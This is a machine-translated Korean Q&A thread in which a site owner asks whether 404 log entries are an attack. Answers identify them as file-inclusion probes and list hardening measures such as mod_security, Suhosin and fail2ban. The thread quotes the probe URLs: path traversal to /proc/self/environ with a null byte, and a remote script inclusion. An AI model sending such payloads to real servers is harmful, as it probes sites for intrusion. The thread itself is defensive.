이것은 해킹 시도입니까?

내 404 로그를 살펴보면 다음 두 URL이 나타 났는데 두 URL이 모두 한 번 발생했습니다.

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

과

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

문제가되는 페이지에는 허용 가능한 값이 6 가지 인 변수와 변수가 library.php필요 합니다. 따라서 유효한 URL은typeid

library.php?type=Circle-K&id=Strange-Things-Are-Afoot

ID는 mysql_real_escape_string데이터베이스를 쿼리하는 데 사용되기 전에 모두 실행 됩니다.

나는 신인이지만,이 두 링크가 모두 웹 루트에 대한 간단한 공격 인 것 같습니다.

1) 404 이외의 이런 종류의 것들로부터 보호하는 가장 좋은 방법은 무엇입니까?

2) IP를 책임 져야 하는가?

편집 : 또한이 하나를 발견

/library.php=http://www.basfalt.no/scripts/danger.txt

편집 2 : 모든 3 가지 공격에 대한 문제의 IP 216.97.231.15는 로스 앤젤레스 외부에 위치한 Lunar Pages라는 ISP를 추적했습니다.

편집 3 : 금요일 아침 현지 시간으로 ISP에 전화하여 전화를 할 수있는 사람과 문제를 논의하기로 결정했습니다. 여기에 24 시간 정도 후에 결과를 게시하겠습니다.

편집 4 : 나는 그들의 관리자에게 이메일을 보내 결국 그들은 "그들이 그것을 찾고 있었다"고 응답 한 다음 "이 문제는 지금 해결되어야한다"고 하루 후에 응답했다. 슬프게도 자세한 내용은 없습니다.

0) 예 최소한이 사이트가 취약한 지 알아 내려는 사이트에 대한 체계적인 프로브입니다.

1) 코드가 깨끗한 지 확인하는 것 외에는 할 수있는 일이 많지 않지만 안전한지 확인하기 위해 호스트에 대해 자체 테스트를 실행하십시오. Google Skipfish는 여러 가지 도구 중 하나입니다.

2) 그렇습니다.

이것은 공격이며 여기에 매우 많이 설명되어 있습니다 .

다른 사람들이 말했듯이 : 예, 그것은 해킹 시도입니다. 이 가능한 손으로 시도하는 것 외에도 봇넷에 의해 실행되는 자동화 된 작업이 많이 있습니다. 일반적으로 이러한 종류의 공격은 오래된 주입 취약점 및 / 또는 SQL 입력, 시스템 또는 파일 유출로 이어지는 사용자 입력의 유효성 검사 실패와 같은 일부 일반적인 코딩 결함을 통해 몰래 침입하려고합니다.

봇넷은 최대 수천 개의 고유 한 IP 주소를 사용할 수 있으므로 봇넷을 손으로 금지하는 것은 불가능할 가능성이 높습니다. 따라서이를 금지하려면 일종의 자동 금지 프로그램을 사용해야합니다. fail2ban 내 마음에 온다; mod_security 이벤트 또는 다른 로그 항목에 반응하도록하십시오.

코드가 깨끗하고 서버가 강화 된 경우 이러한 해킹 시도는 성가신 로그 오염 일뿐입니다. 그러나 예방 조치를 취하고 필요에 따라 다음 중 일부 또는 전부를 고려하는 것이 좋습니다.

• mod_security 는 모든 종류의 일반적인 해킹 시도를 필터링하는 Apache 모듈입니다. 의심스러운 JavaScript 등이 보이는 경우 아웃 바운드 트래픽 (서버가 클라이언트로 보내는 페이지)을 제한 할 수도 있습니다.

• PHP 자체를 강화하는 수호신 .

• 스크립트를 소유 한 사용자로 PHP 스크립트를 실행하십시오. suphp 및 php-fpm 과 같은 것이 가능합니다.

• 웹 루트 및 PHP 임시 디렉토리를 noexec, nosuid, nodev 로 마운트하십시오 .

• system 및 passthru 와 같은 불필요한 PHP 기능을 비활성화하십시오 .

• 불필요한 PHP 모듈을 비활성화하십시오. 예를 들어, IMAP 지원이 필요하지 않으면 활성화하지 마십시오.

• 서버를 최신 상태로 유지하십시오.

• 통나무를 주시하십시오.

• 백업이 있는지 확인하십시오.

• 누군가가 당신을 해킹하거나 다른 재난이 당신을 때리면 어떻게해야할지 계획하십시오.

좋은 시작입니다. 그런 다음 Snort 및 Prelude 와 같은 더 극단적 인 조치가 있지만 대부분의 설정에서 너무 과도 할 수 있습니다.

이러한 쿼리를 수행하는 컴퓨터는 봇넷 좀비 일 가능성이 큽니다. 여러 IP에서 이러한 요청을 수신하는 경우, 효과를 내려면 인터넷의 절반을 금지해야하므로 금지 할 가치가 없습니다.

이미 말했듯이 더 많은 정보를 얻으려면 / proc / self / environ 파일에 액세스하려고합니다.

나는 그것이 리눅스 머신이라고 가정한다 :

사용해야합니다

• 수호신 ( http://www.hardened-php.net/suhosin/)-PHP 스크립트를 보호합니다
• PHP openbasedir 제한 사용
• fail2ban http://www.fail2ban.org/

공격 서버의 IP를 차단할 수 있지만이 기능은 공격하지 않을 수 있습니다.

내 서버가 공격을받을 때 일부 서비스를 차단하는 데 사용했습니다 : http / https / pop / imap / ssh 그러나 smtp를 열어 두십시오. 실수하면 실수를 알 수 있습니다.

예, 침입 시도입니다. IP를 반드시 금지해야합니다. IP가 국가 외부에 있다고 판단되면 IP가 속한 전체 서브넷을 차단할 수 있습니다. 이것은 서버 문제보다 코드 문제가 적습니다. 이 특정 침입을 살펴보고 호스팅 제공 업체가 이와 유사한 스크립트 아동 시도 (이것처럼 보이는)에 취약하지 않은지 확인하십시오.

이것은 웹 서버를 통해 액세스 할 수있는 서버 측 스크립트 의 잠재적 인 임의 로컬 파일 포함 취약점 을 악용하려는 시도 입니다. 취약한 리눅스 시스템 /proc/self/environ에서는 서버 측에서 임의의 코드를 실행하기 위해 악용 될 수 있습니다.

Janne Pikkarainen이 추천 한대로 :

통나무를 주시하십시오.

백업이 있는지 확인하십시오.

이러한 로그의 일부로 침입 탐지 시스템의 일부로 웹 사이트를 포함한 파일의 변경 사항을 모니터링하는 것이 중요합니다. 구성 파일에 대해 기본적으로이를 수행하는 OpenBSD가 그 예입니다. 나는 이것을 다음과 같이 제기합니다.

• Cloud Sites의 경우 사용자 정의 빌드 웹 사이트에서 PHP 파일을 약간 수정했습니다 (비표준 태그를 출력했지만 익스플로잇의 크기를 측정하는 테스트의 일부일 수 있음).
• 한 동료의 경우 WordPress .htaccess 파일 내에 미묘한 리디렉션이있었습니다 (Google 검색 결과의 리퍼러 만 해당).
• 다른 동료의 경우 Joomla 구성 파일에 미묘한 수정이있었습니다 (무엇을 기억할 수 없으며 특정 조건에서 리디렉션 된 것 같습니다).